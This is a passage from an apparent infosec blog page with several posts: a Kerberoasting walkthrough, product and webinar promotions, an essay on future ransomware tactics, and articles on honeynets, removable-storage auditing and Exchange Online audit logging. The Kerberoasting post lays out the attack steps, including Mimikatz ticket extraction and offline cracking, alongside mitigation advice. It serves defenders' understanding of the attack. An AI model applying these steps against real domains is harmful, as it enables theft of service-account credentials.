Security, et al

Randy's Blog on Infosec and Other Stuff

Extracting Service Account Passwords with Kerberoasting

Thu, 07 Sep 2017 13:32:38 GMT

Service Account Attack #2: Extracting Service Account Passwords

In our first post, we explored how an attacker can perform reconnaissance to discover service accounts within an Active Directory (AD) domain. Now that we know how to find service accounts, let’s look at how an attacker can compromise those accounts and use them to exploit their privileges. In this post, we will explore one such method for doing that: Kerberoasting. This method is especially scary because it requires no elevated privileges within the domain, is very easy to perform once you know how, and is virtually undetectable.

Kerberoasting: Overview

Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). If you remember, in the reconnaissance post we focused on discovering service accounts by scanning for user objects’ SPN values. Kerberoasting allows us to crack passwords for those accounts. By logging into an Active Directory domain as any authenticated user, we are able to request service tickets (TGS) for service accounts by specifying their SPN value. Active Directory will return an encrypted ticket, which is encrypted using the NTLM hash of the account that is associated with that SPN. You can then brute force these service tickets until successfully cracked, with no risk of detection or account lockouts. Once cracked, you have the service account password in plain text.

Even if you don’t fully understand the inner-workings of Kerberos, the attack can be summarized as:

  1. Scan Active Directory for user accounts with SPN values set.
  2. Request service tickets from AD using SPN values
  3. Extract service tickets to memory and save to a file
  4. Brute force attack those passwords offline until cracked

With those steps in mind, you can imagine how easy it may be to get access to a domain and begin cracking all service accounts within minutes. From there, it’s just a waiting game until you have compromised one or more service accounts.

For a better understanding of the types of access that can be garnered using Kerberoasting, look at the list of SPN values maintained by Sean Metcalf on

Kerberoasting: How it Works

Step 1 – Obtain a list of SPN values for user accounts

We focus on user accounts because they have shorter, less secure passwords. Computer accounts have long, complex, random passwords that change frequently.  There are many ways to get this information, including:

Step 2 – Request Service Tickets for service account SPNs

To do this, you need to simply execute a couple lines of PowerShell and a service ticket will be returned and stored in memory to your system.Requesting Kerberos service tickets (TGS) for Service Principal Names found by querying Active Directory user accounts as an authenticated user

These tickets are encrypted with the password of the service account associated with the SPN. We are almost ready to start cracking them.

Step 3 – Extract Service Tickets Using Mimikatz

Mimikatz allows you to extract local tickets and save them to disk. We need to do this so we can pass them into our password cracking script. To do this, you must install Mimikatz and issue a single command.

Extracting service tickets using Mimikatz to pass them into the password cracking script without using admin rights

Step 4 – Crack the Tickets

Now that you have the tickets saved to disk, you can begin cracking the passwords. Cracking service accounts is a particularly successful approach because their passwords very rarely change. Also, cracking the tickets offline will not cause any domain traffic or account lockouts, so it is undetectable.

The Kerberoasting toolkit provides a useful Python script to do this. It can take some configuration to make sure you have the required environment to run the script; there is a useful blog here, which covers those details for you.

The script will run a dictionary of passwords as NTLM hashes against the service tickets you have extracted until it can successfully open the ticket. Once the ticket can be opened, you have cracked the service account and are provided with its clear-text password! 

Using Kerberoasting to crack service account tickets with from the Python script to extract the service account’s clear-text password

Protecting Yourself from Kerberoasting Attacks

The best mitigation for this attack is to ensure your service accounts that use Kerberos with SPN values leverage long and complex passwords. If possible, rotate those passwords regularly. Using group managed service accounts will enforce random, complex passwords that can be automatically rotated and managed centrally within AD.

To detect the attack in progress, monitor for abnormal account usage. Service accounts traditionally should be used from the same systems in the same ways, so it is possible to detect authentication anomalies. Also, you can monitor for service ticket requests in Active Directory to look for spikes in those requests.

This is the second installment in our blog series, 4 Service Account Attacks and How to Protect Against Them. To read the other installments, please click Read Now below or watch the webinar here .

Service Account Attack #1 – Discovering Service Accounts without using Privileges Read Now
Service Account Attack #3 – Targeted Service Account Exploitation with Silver Tickets Read Now
Service Account Attack #4 – Exploiting the KRBTGT service account for Golden Tickets Read Now

Watch this video and sign up for the complete Active Directory Attacks Video Training Series here (CPE Credits offered).

email this digg reddit dzone
comments (0)references (1)

Extracting Service Account Passwords with Kerberoasting
Complete Domain Compromise with Golden Tickets
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online

Today's webinar includes first-hand account of a company brought to its knees by NotPetya

Wed, 26 Jul 2017 18:24:34 GMT

We have an added treat in today's real training for free ™ session.  2 of my guests on the webinar will describe their firsthand experience with helping a company recover from NotPetya and their lessons learned so far.  All 15,000 employees were sent home except for the IT staff tasked with rebuilding their infrastructure from scratch.  That's just the beginning.

Title: Something Worse Than Ransomware: Architecting for a New Breed of Malware that Simply Destroys

Click here to register

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
5 Indicators of Endpoint Evil
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Anatomy of a Hack Disrupted: How one of SIEM’s out-of-the-box rules caught an intrusion and beyond

Two new "How-To" Videos on Event Monitoring

Wed, 21 Jun 2017 14:02:26 GMT

I just released two new "How-To" video's on monitoring two important areas with Windows Event Collection.

Video 1 - In this 4 minute video, I show you step-by-step how you can use my latest product, Supercharger, to create a WEC susbscription that pulls PowerShell security events from all of your endpoints to a central collector.

Video 2 - In this 8 minute video, you will learn how to monitor security event ID 4688 from all of your endpoints. Obviously this would normally create a plethora of data but using Supercharger's Common System Process noise filter you will see how you can leave 60% of the noise at the source.

You can watch the video's by clicking on the links above or visiting the resources page for Supercharger by clicking here.

email this digg reddit dzone
comments (0)references (0)

Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
5 Indicators of Endpoint Evil
Anatomy of a Hack Disrupted: How one of SIEM’s out-of-the-box rules caught an intrusion and beyond

Download Supercharger Free Edition for Easy Management of Windows Event Collection

Wed, 14 Jun 2017 08:59:58 GMT

We just released a new and free edition of Supercharger for Windows Event Collection which you can get here

There are no time-outs and no limits on the number of computers you can manage with Supercharger Free.

I wanted to include more than enough functionality so that anyone who uses WEC would want to install Supercharger Free right away.  For non-WEC users, Free Edition helps you get off the ground with step-by-step guidance. 

With Supercharger Free you can stop remoting into each collector and messing around with Event Viewer just to see the status of your subscriptions.  You can see all your collectors, subscriptions and source computers on a single pane of glass – even from your phone.  And you can create/edit/delete subscriptions as necessary.

I also wanted to help you get more from WEC’s ability to filter out noise events at the source by leveraging my research on the Windows Security Log. 

Supercharger Free Edition:

  • Provides a single pane of glass view of your entire Windows Event Collection (WEC) environment across all collectors and domains
  • Virtually eliminates the need to remote into collectors and wrestle with Event Viewer.  You can manage subscriptions right from the dashboard
  • Includes a growing list of my personally-built Security Log noise filters that help you get the events you need while leaving the noise behind

The manager only takes a few minutes to install and can even co-exist on a medium loaded collector.  Then it’s just seconds to install the agent on your other collectors.  You can uninstall Supercharger without affecting your WEC environment. 

I hope Supercharger Free is something that saves you time and helps you accomplish more with WEC.

This is just the beginning.  We’ve got more exciting and free stuff coming.  But you’ll need at least Supercharger Free to make use of what’s next, so install it today if you can.

Thank you for supporting my site of the years.  Here’s something new and free to say thanks.

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
5 Indicators of Endpoint Evil
Live with Dell at RSA 2015
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure

How to Monitor Active Directory Changes for Free: Using Splunk Free, Supercharger Free and My New Splunk App for LOGbinder

Fri, 02 Jun 2017 17:11:59 GMT

No matter how big or small you are, whether you have budget or not – you need to be monitoring changes in Active Directory.  There are awesome Active Directory audit solutions out there.  And ideally you are using one of them.  But if for whatever reason you can’t, you still have AD and it still needs to be monitored.  This solution helps you do just that.  

Yesterday during my webinar: How to Monitor Active Directory Changes for Free: Using Splunk Free, Supercharger Free and My New Splunk App we released a version of our Splunk App for LOGbinder.  Not only is this application free, but with the help of our just announced free edition of Supercharger for Windows Event Collection, we demonstrate the power of WEC’s Xpath filtering to deliver just the relevant events to Splunk Free and stay within the 500MB daily limit of Splunk Light’s free limitations.  It’s a trifecta free tools that produces this:

Among other abilities, our new Splunk App puts our deep knowledge of the Windows Security Log to work by analyzing events to provide an easy to use but powerful dashboard of changes in Active Directory.  You can see what’s been changing in AD sliced up

by object type (users, groups, GPOs, etc)
by domain
by time
by administrator

Too many times I see dashboards that showcase the biggest and highest frequency actors and subjects but get real – most of the time what you are looking for is the needle – not the haystack.  So we show the smallest, least frequent actors and objects too.  

Just because it’s free doesn’t mean it’s low value.  We put some real work into this.  I always learn something new about or own little AD lab environment when I bring this app up.  To make this app work we had to make some improvements to how Splunk parses Windows Security Events.  The problem with stuff built by non-specialists is that it suffices for filling in a bullet point like “native parsing of Windows Security Logs” but doesn’t come through when you get serious about analysis.  Case-in-point: Splunk treats these 2 very different fields in the below event as one:

As you can see rsmith created the new user cmartin.  But checkout what Splunk does with that event:

Whoah! So there’s no difference between the actor and the target of a critical event like a new account being created?  One Splunker tells me they have dealt with this issue by ordinal position but I'm frightened that actor and target could switch positions.  Anyway, it’s ugly.  Here’s what the same event looks like once you install our Splunk App:

That’s what I'm talking about! Hey, executives may say that’s just the weeds but you and I know that with security the devil is in the details.  

Now, you knowledgeable Splunkers out there are probably wondering if we get these events by defining them at index time.  And the answer is “no”.  I provided the Windows Security Log brains but we got a real Splunker to build the app and you’ll be happy to know that Imre defined these new fields as search time fields.  So this works on old events already indexed and more importantly doesn’t impact indexing.  We tried to do this right.

Plus, we made sure this app works whether you consume events directly from the Security log of each computer or via Windows Event Collection (which is what we recommend with the help of Supercharger). 
To learn more about the over all solution please watch the webinar which is available on demand at

For those of you new to Splunk, we’ll quickly show you how to install Splunk Free and our Splunk App.  Then we’ll show you how in 5 minutes or our free edition of Supercharger for Windows Event Collection can have your domain controllers efficiently forwarding just the relative trickle of relevant change events to Splunk.  Then we’ll start rendering some beautiful dashboards and drilling down into those events.  I'll briefly show you how this same Splunk app can also analyze SharePoint, SQL Server and Exchange security activity produced by our LOGbinder product and mix all of that activity with AD changes and plot it on a single pane of glass.

Or checkout the solution page at where there are links to the step-by-step directions.

And if you are already proficient with Splunk and collecting domain controller logs you can get the Splunk app at and look under SIEM Integration.  

For technical support please use the appropriate forum at 

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
5 Indicators of Endpoint Evil
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Live with Dell at RSA 2015

Ransomware Is Only Getting Started

Mon, 29 May 2017 16:20:01 GMT

Ransomware is about denying you access to your data via encryption. But that denial has to be of a great enough magnitude create sufficient motivation for the victim to pay. Magnitude of the denial is a factor

  • Value of the encrypted copy of the data which is a function of
    • Intrinsic value of the data (irrespective of how many copies exist)
    • The number of copies of the data and their availability
  • Extent of operations interrupted

If the motivation-to-pay is about the value of the data, remember that the data doesn’t need to be private. It just needs to be valuable. The intrinsic value of data (irrespective of copies) is only the first factor in determining the value of the criminally encrypted copy of the data. The number copies of the data and their level of availability exert upward or downward pressure on the value of the encrypted data. If the victim has a copy of the data online and immediately accessible the ransomware encrypted copies has little to know value. On the other hand, if there’s no backups of the data the value of the encrypted copy skyrockets.

But ransomware criminals frequently succeed in getting paid even if the value of the encrypted copy of data is very low. And that’s because of the operations interruption. An organization may be hit by ransomware that doesn’t encrypt a single file containing data that is intrinsically valuable. For instance, the bytes in msword.exe or outlook.exe are not valuable. You can find those bytes on billions of PCs and download them at any time from the Internet.

But if a criminal encrypts those files you suddenly can’t work with documents or process emails. That user is out of business. Do that to all the users and the business is out of business.

Sure, you can just re-install Office, but how long will that take? And surely the criminal didn’t stop with those 2 programs.

Criminals are already figuring this out. In an ironic twist, criminals have co-opted a white-hat encryption program for malicious scrambling of entire volumes. Such system-level ransomware accomplishes complete denial of service for the entire system and all business operations that depend on it.

Do that to enough end-user PCs or some critical servers and you are into serious dollar losses no matter how well prepared the organization.

So we are certainly going to see more system-level ransomware.

But encrypting large amounts of data is a very noisy operation that you can detect if you are watching security logs and other file i/o patterns which just can’t be hidden.

So why bother with encrypting data in the first place. Here’s 2 alternatives that criminals will increasingly turn to

  • Storage device level ramsomware
  • Threat of release

Storage device level ransomware

I use the broader term storage device because of course mechanical hard drives are on the way out. Also, although I still use the term ransomware, storage device level ransomware may or may not include encryption. The fact is that storage devices have various security built-in to them that can be “turned”. As a non-encryption but effective example take disk drive passwords. Some drives support optional passwords that must be entered at the keyboard prior to the operating system booting. Sure the data isn’t encrypted and you could recover the data but at what cost in terms of interrupted operations?

But many drives, flash or magnetic, also support hardware level encryption. Turning on either of these options will require some privilege or exploitation of low integrity systems but storage level ransomware will be much quieter, almost silent, in comparison to application or driver level encryption of present-day malware.

Threat of release

I’m surprised we haven’t heard of this more already. Forget about encrypting data or denying service to it. Instead exfiltrate a copy of any kind of information that would be damaging if it were released publicly or to another interested party. That’s a lot of information. Not just trade secrets. HR information. Consumer private data. Data about customers. The list goes on and on and on.

There’s already a burgeoning trade in information that can be sold – like credit card information but why bother with data that is only valuable if you can sell it to someone else and/or overcome all the fraud detection and lost limiting technology that credit card companies are constantly improving?

The data doesn’t need to be intrinsically valuable. It only needs to be toxic in the wrong hands.

Time will tell how successful this will be it will happen. The combination of high read/write I/O on the same files is what makes ransomware standout right now. And unless you are doing transparent encryption at the driver level, you have to accomplish it in bulk as quickly as possible. But threat-of-release attacks won’t cause any file system output. Threat-of-release also doesn’t need to process bulk amounts of information as fast as possible. Criminals can take their time and let it dribble out of the victim’s network their command and control systems. On the other hand, the volume of out bound bandwidth with threat of release is orders of magnitude higher than encryption-based ransomware where all the criminal needs to send is encryption keys.

As with all endpoint based attacks (all attacks for that matter?) time is of the essence. Time-to-detection will continue to determine the magnitude of losses for victims and profits for criminals.

This article by Randy Smith was originally published by EventTracker

email this digg reddit dzone
comments (0)references (0)

5 Indicators of Endpoint Evil
Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
Anatomy of a Hack Disrupted: How one of SIEM’s out-of-the-box rules caught an intrusion and beyond
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure

Just released: Randy Franklin Smith whitepaper

Fri, 19 May 2017 11:42:23 GMT

Just released: “Top 10 Ways to Identify and Detect Privileged Users by Randy Franklin Smith” white paper.

Read it online here:

email this digg reddit dzone
comments (0)references (0)

5 Indicators of Endpoint Evil
Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Anatomy of a Hack Disrupted: How one of SIEM’s out-of-the-box rules caught an intrusion and beyond

Work Smarter – Not Harder: Internal Honeynets Allow You to Detect Bad Guys Instead of Just Chasing False Positives

Tue, 07 Mar 2017 10:44:31 GMT

Log collection, SIEM and security monitoring are the journey not the destination. Unfortunately, the destination is usually a false positive. This is because we’ve gotten very good at collecting logs and other information from production systems, filtering that data and presenting it on a dashboard. But we haven’t gotten that good at distinguishing events triggered by bad guys from those triggered by normal every day activity.

A honeynet changes that completely.

At the risk of perpetuating a bad analogy I’m going to refer to the signal to noise ratio often thrown around when you talk about security monitoring. If you like that noise/signal concept then the difference is like putting an egg timer in the middle of time square at rush hour. Trying to hear it is like trying to pickout bad guy activity in logs collected from production systems. Now put that egg timer in a quiet room.  That’s the sound of a bad guy hitting an internal honeynet.

Honeynets on your internal network are normally very quiet. The only legitimate stuff that’s going to hit them are things like vulnerability scanners, network mapping tools and… what else? What else on your network routinely goes out and touches IP addresses that it’s not specifically configured to communicate with?

So you either configure those few scanners to skip your honeynet IP ranges or else you leverage them for as positive confirmation that your honeynet is working and reporting when it’s touched. You just de-prioritize that expected traffic to an “honorable mention” pane on your dashboard.

On the other hand, (unless someone foolishly publishes it) the bad guy isn’t going to know the existence of your honeynet or its coordinates. So as he routinely scans your network he’s inevitably going to trip over your honeynet. If you’ve done it right. But let’s talk about some of these points.

First, how would a bad guy find out about your honeynet?

  • Once he gets control of IT admin users accounts and reads their email, has access to your network and security documentation, etc. But if you have good privileged access controls this should be fairly late stage. Honeynets are intended to catch intrusions at early to mid-stage.
  • By lurking on support forums and searching the Internet (e.g. Stackoverflow, honeynet vendor support sites). It goes without saying, don’t reveal your name, company or company email address in your postings.
  • By scanning your network. It’s pretty easy to identity honey nets when you come across them – especially low-interaction honeynets which are most common. But guess what? Who cares? They’ve already set off the alarm. So this one doesn’t count.

So, honeynets are definitely a matter of security through obscurity. But you know what? We rely on security through obscurity a lot more than we think. Encryption keys are fundamentally security through obscurity. Just really, really, really, good obscurity. And security through obscurity is only a problem when you are relying on it as a preventive control – like using a “secret” port number instead of requiring an authenticated connection. Honeynets are detective controls.

But what if you are up against not just a persistent threat actor but a patient, professional and cautious one who assumes you have a honeynet and you’re listening to it. He’s going to tiptoe around much more carefully. If I were him I would only touch systems out there that I had reason to believe were legitimate production servers. Where would I collect such information? Places like DNS, browser history, netstat output, links on intranet pages and so on.

At this time, most attackers aren’t bothering to do that. It really slows them down and they know it just isn’t necessary in most environments. But this is a constant arms race so it good to think about the future. First, a bad guy who assumes you have a honeynet is a good thing because of what I just mentioned. It slows them down. Giving more time for your other layers of defense to do their job.

But are there ways you to optimize your honeynet implementation for catching the honeynet-conscious, patient attacker? One thing you can do is go to the extra effort and coordination with your network team to reserve more and smaller sub-ranges of IP addresses for your honeynet so that its widely and granularly dispersed throughout address space. This makes it harder to make a move without hitting your honey net and further reduces the assumptions that attackers usually find it safe to make such as that all your servers are in range for static addresses, workstations in another discreet range for DHCP and then another big block devoted to your honeynet.

The bottom line though is Honeynets are awesome. You get very high detection with comparatively small investment. Checkout my recent webinar on Honeynets sponsored by EventTracker who now offers a Honeynet-as-a-Service that is fully integrated with your SIEM. Deploying a honeynet and keeping it running is one thing, but integrating it with your SIEM is another. EventTracker nails both.

This article by Randy Smith was originally published by EventTracker”

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
5 Indicators of Endpoint Evil
Live with Dell at RSA 2015

Tracking removable storage with the Windows Security Log

Mon, 02 Jan 2017 10:46:36 GMT

With data breaches and Snowden-like information grabs I’m getting increased requests for how to track data moving to and from removable storage such as flash drives. The good news is that the Windows Security Log does offer a way to audit removable storage access. I’ll show you how it works and since the sponsor for this post, EventTracker, has some enhanced capabilities in this area I’ll briefly compare native auditing to EventTracker.

Removable storage auditing in Windows works similar to and logs the exact same events as File System auditing. The difference is in controlling what activity is audited.

To review, with File System auditing, there are 2-levels of audit policy. First you enable the Audit File System audit subcategory at the computer level. Then you choose which folders you wish to audit and enable object level auditing on those folders for the users/groups, permissions and success/failure results that need to be monitored. For instance you can audit Read access on C:\documents for the SalesReps group.

However Removable Storage auditing is much simpler to enable and far less flexible. After enabling the Removable Storage audit subcategory (see below) Windows begins auditing all access requests for all removable storage. It’s equivalent to enabling auditing Full Control for Everyone.

As you can see auditing removable storage is an all or nothing proposition. Once enabled, Windows logs the same event ID 4663 as for File System auditing. For example the event below shows that user rsmith wrote a file called checkoutrece.pdf to a removable storage device Windows arbitrarily named \Device\HarddiskVolume4 with the program named Explorer (the Windows desktop).

How do we know this is a removable storage event and not just normal File System auditing? After all it’s the same event ID as used for normal file system auditing. Notice the Task Category above which says Removable Storage. The information under Subject tells you who performed the action. Object Name gives you the name of the file, relative path on the removable storage device and the arbitrary name Windows assigned the device the first time it was connected to this system. Process information indicates the program used to perform the access. To understand what type of access (e.g. Delete, Write, Read) was performed look at the Accesses field which lists the permissions actually used.

If you wish to track information being copied from your network to removable storage devices you should enable Audit Removable Storage via group policy on all your endpoints. Then monitor for Event ID 4663 where Task Category is Removable Storage and Accesses is wither WriteData or AppendData.

As you can see Microsoft took the most expedient route possible to providing an audit trail of removable storage access. There are events for tracking the connection of devices – only the file level access events of the files on the device. These events also do not provide the ability to see the device model, manufacturer or serial number. That device information is known to Windows – it just isn’t logged by these events since they captured at the same point in the operating system that other file access events are logged. On the other hand, EventTracker’s agent logs both connection events and information about each device. In fact EventTracker event allows you selectively block or allow access to specific devices based on policy you specify. I encourage you to check out EventTracker’s enhanced abilities.

This article by Randy Smith was originally published by EventTracker

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
Understanding the Difference between “Account Logon” and “Logon/Logoff” Events in the Windows Security Log
5 Indicators of Endpoint Evil
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online

Tue, 27 Dec 2016 10:16:02 GMT

Email remains one of the most heavily used communications mediums within organizations today. With as much as 75 percent of your organization’s intellectual property stored in email[1], Microsoft Exchange is for all practical purposes a treasure trove of organization’s most valuable secrets—just waiting for inappropriate access.

Regulatory bodies realize this and therefore email and compliance go hand in hand-in-hand. So IT needs to keep a watchful eye on exactly who is accessing what within Exchange Online. And that focus shouldn’t be only on the people you trust, such as those who have been granted access to a given mailbox, but on any user. IT needs to help ensure visibility into the actions of potential threat actors who might have hijacked privileged accounts. The first thing external threat actors do after infiltrating your network is attempt to identify accounts that have elevated permissions. And those accounts can have access to the sensitive information stored within Exchange Online.

For years, Microsoft has enabled an audit trail within on-premises Exchange Server. The same capability exists for Exchange Online—with some improvements to boot—giving IT organizations visibility into actions performed by administrators and regular users alike. But be forewarned: You’re largely on your own here. Microsoft has provided some functionality via administrative consoles, but the ability to successfully enable, configure, and audit Exchange Online events depends fairly heavily on PowerShell[LP1].

The challenge isn’t configuring the auditing of events; that part is simple. Rather, the challenge is finding the event or events that are pertinent to the auditing query in question. If you’ve spent any time in Event Viewer, you know how it feels to rummage through countless thousands of event entries, trying to find the one entry you’re looking for.

Microsoft has taken great strides to provide you the tools necessary to simplify the process of auditing. Still, a bit of work remains to enable, configure, and retrieve meaningful audit data.

This whitepaper explains those necessary steps and provides guidance for properly auditing changes to your Exchange Online environment within Office 365. The paper also covers ways to focus your auditing lens on the right what, who, and where so that you can quickly and accurately find answers to those sometimes difficult auditing questions. 

Auditing Experts – Quest


Understanding what’s going on within Exchange Online involves much more than the ability to centralize audit data. To truly audit such complex environments, you need a deeper understanding of each event and its detail, how audit events correlate, and what that information means to the organization—along with the ability to make the data understood.


Quest Change Auditor is the culmination of tens of thousands of hours of work dissecting every auditable event over a variety of platforms and applications. This effort turns raw, indecipherable information into intelligent detail, from which an IT organization can obtain actionable insight.


Look for auditing insights from Quest throughout this paper.

Connecting to Office 365 to Enable and Configure Auditing

The first step is to enable auditing. Auditing is disabled by default, as not every organization is required to — or even interested in — auditing what happens within Exchange Online. As previously mentioned, much of this step happens in PowerShell. You’ll need to connect to Exchange Online via PowerShell so that all commands are run against your instance of Exchange Online.

Open a PowerShell window. You don’t need to be a local admin to run Exchange commands against the cloud, but you do need appropriate permissions within Exchange Online; more on these permissions soon. To connect to Exchange Online, you’ll run four commands.

Set-ExecutionPolicy RemoteSigned

This command tells PowerShell that any scripts that are downloaded by a trusted publisher (Microsoft, in this case) can run on the local computer.

$UserCredential = Get-Credential

This command displays a login dialog box that you use to store an Office 365 admin credential (which does not necessarily need to be the same credential you used to start the PowerShell window) as a parameter for use in the third command.

$Session = New-PSSession –ConfigurationName Microsoft.Exchange –ConnectionUri -Credential $UserCredential –Authentication Basic –AllowRedirection

This command establishes a new PowerShell session with Office 365, using the provided credentials and the specified URL. The command stores all this information in the $Session variable.

Import-PSSession $Session

This command imports commands (e.g., cmdlets, functions, aliases) from the remote computer (i.e., Office 365) into the current session. At this point, you’re properly connected to Exchange Online and can begin auditing your Exchange Online environment. 

Quest Insight – What Should You Be Auditing?

Exchange Online can be configured to generate a ton of information—which, of course, means more data for you to sift through. Because you are essentially in control of how much audit data is generated, you can determine which activities to include. You can focus on three categories of audit activity:


·         Message tracking is the actual flow of messages from one user to another. At a minimum, this category can be used to show who is emailing whom, such as whether email is being sent to a competitor. On a larger scale, message tracking can be used with analytics to see how the business uses email. This tracking is useful to see how internal messaging flows; for example, from one department to another. Message tracking can also be used to see the flow of traffic in and out of the organization; for example, which domains send or receive the most email. You can use the Get-MessageTrace cmdlet to retrieve a list of messages that meet query criteria such as sender or recipient address, date range, or source IP address. This activity is most appropriate when a review of specific sent and received messages is needed in addition to a review of mailbox contents. This tracking can also be useful when connected to a SIEM solution, using keyword alerts to identify inappropriate messages.

·         Admin operations involve any actions that are taken within Office 365, including actions by your IT team or Microsoft (which maintains the Exchange Online instance). Admin operations, such as assigning permissions to a mailbox or setting up forwarding rules, can play a key role during an audit; even IT can play a role in inappropriate behaviors.

·         Non-owner mailbox access occurs whenever someone other than the owner accesses a mailbox. This category is important when sensitive information has been inappropriately accessed or forwarded, and the focus is on identifying who is responsible.


Because message tracking typically falls outside an IT security audit, this paper foregoes that topic and focuses on the other two audit areas, which directly affect your organization’s ability to document access, changes, and actions that would be of interest during an audit.

Auditing Admin Operations

Auditors are big believers in the ability to watch the watchers. Questions around changes that IT has made are just as important as those that focus on users exercising access that IT has granted. For example, if an audit revolves around the CEO forwarding intellectual property to a competitor, a good auditor doesn’t just accept that the CEO forwarded the information. Rather, the auditor also asks who has been granted permissions to the CEO’s mailbox—and who in IT granted those permissions.

Both security and compliance initiatives are useless without auditing admin operations. Because there are no preventative controls for admins (who need the ability to do “everything” to get their job done), the need for controls that detect and deter inappropriate behavior is necessary. By putting an audit trail in place, you create accountability. After all, knowing that they’re being audited tends to encourage admins to keep their behavior in check.

When it comes to Exchange Online, a number of actions can indicate malicious activity. For example, the exporting of a mailbox doesn’t require logging on to the mailbox; IT can simply export and review the local PST. Therefore, IT logging on to an exported mailbox should trigger non-owner mailbox auditing. Another example is granting permissions: IT could assign a cohort inappropriate permissions to another user’s mailbox, and then remove those permissions after improper access is completed. Unless you have non-owner mailbox auditing enabled, this access would go completely unnoticed.

You can see why admin operations need to be included as part of your auditing strategy. Everything an admin does within Exchange Online is ultimately a PowerShell command, so Exchange audits admin activity at the PowerShell level. Each time an audited cmdlet is run, the action is logged.

To check which auditing is enabled within your organization, you can use the Get-AdminAuditConfig command, shown in the following figure.

Place specific focus on the AdminAuditLogCmdlets, AdminAuditLogExcludedCmdlets, and AdminAuditLogParameters fields, which identify whether every admin operation is audited or a subset.

Quest Insight – Age Limits

By default, admin audit data is kept for 90 days (as indicated by the AdminAuditLogAgeLimit value in the previous figure). You might want to consider extending the retention time. Organizations that perform annual audits should consider extending this value to more than 365 days (one year).

To enable auditing, you need to leverage the Set-AdminAuditLogConfig cmdlet:

Set-AdminAuditLogConfig –AdminAuditLogEnabled $true

Quest Insight – Enabling Just the Right Amount of Admin Auditing

Each organization has different auditing requirements, so auditing of admin actions isn’t always as simple as “just audit everything.” If you simply enable all admin auditing, you’ll see all the changes that Microsoft makes on the back end, which might be something you don’t care to filter through during an audit.


Because admin auditing is based on the premise that every performed action relates to running a PowerShell cmdlet, the Set-AdminAuditLogConfig cmdlet enables you to specify which cmdlets and cmdlet parameters to include or exclude. Be sure to note that auditing of commands in Exchange Online does not include read-only types of commands, such as any Get and Search commands.


You can specify individual cmdlets or use wildcard characters to denote a group of cmdlets:


Set-AdminAuditLogConfig –AdminAuditLogEnabled $true

-AdminAuditLogCmdlets * -AdminAuditLogParameters *

-AdminAuditLogExcludedCmdlets *Mailbox*, *TransportRule*


 So, how do you get this information out of Office 365?


There are two ways to extract admin auditing information from Office 365: via PowerShell or by using the Office 365 Security & Compliance portal.

Auditing via PowerShell

Using PowerShell to audit can be accomplished by using the Search-AdminAuditLog cmdlet. When you use this cmdlet with no filtering parameters, you obtain the last 1000 entries. This information shows the cmdlets and parameters that were used, who ran each action, whether the action was successful, the object affected, and more, as shown in the following figure.

The Search-AdminAuditLog cmdlet results don’t provide comprehensive detail; for example, the Caller field, which specifies which users called the cmdlet, is blank. So the cmdlet is more useful if you’re trying to get an overview of changes made rather than performing an actual audit.

You can alternatively use the New-AdminAuditLogSearch cmdlet to receive an emailed XML report of the log entries within a specified date. For example, in the following figure, you can see that an admin is adding full mailbox permissions to the user bbrooks.


Quest Insight – Filtering Cmdlet Searches

The basic cmdlets return a large amount of data that might include the behind-the-scenes management actions performed by Microsoft. So it’s important to use the cmdlet’s parameters to filter the noise of all the resulting data.


Both the Search-AdminAuditLog and New-AdminAuditLogSearch cmdlets enable you to filter by date, cmdlet used, parameters used, the user who performed the action, whether that user is external to the organization, and the objects that the action affected.


By using some of these filters, you can hone down the results to a more pertinent set of data, increasing your productivity by more quickly finding the answers you need. 

Auditing via the Office 365 Security & Compliance Portal

Those who simply aren’t “PowerShell people” and would rather use a management console can take advantage of the Audit Log Search functionality in the Office 365 Security & Compliance Portal. In the pre-created Activities, you can begin your audit by simply selecting a management action, such as the delegation of mailbox permissions in the following figure. You can use the additional filter fields to further refine the results to the few that meet your criteria.

Be aware that the Activities are a double-edged sword. You are limited to those activities (with the supported filters) and cannot generate custom search scenarios of your own. For example, you can’t search for every time someone exported a mailbox (at the time of this writing).

Results can be exported as well, for reporting and further analysis.

You will experience a few limitations should you choose to use the console. First, you’re limited to only 90 days of audit data — and there’s no way around that. In addition, although audit data is available to PowerShell cmdlets within 30 minutes, accessing the same data via the console can take up to 24 hours.

Auditing Non-Owner-Mailboxes

Auditing administrative actions helps to identify the events leading up to inappropriate activity within Exchange. But the real value is found in auditing access to the data that is stored within Exchange. The assumption with non-owner mailbox auditing is that the mailbox owner is using the mailbox appropriately. (Sure, cases of insider misuse by a mailbox owner exist, but those issues are addressed by message tracking.) So, the focus shifts to any non-owners that access a given mailbox.

In general, you should be concerned any time a non-owner views, sends email on behalf of, or deletes email in another user’s mailbox. Delegates — a part of Exchange for as long as the product has been available — are a vital part of the productivity of many users who require assistance from other employees. But because delegate access exists, and because inappropriate delegate access can be granted, auditing non-owner access to mailboxes provides an important piece of data. 

Quest Insight – Which Mailboxes Should You Audit?

Which mailboxes to audit is a valid question. Find the answer by considering these questions:


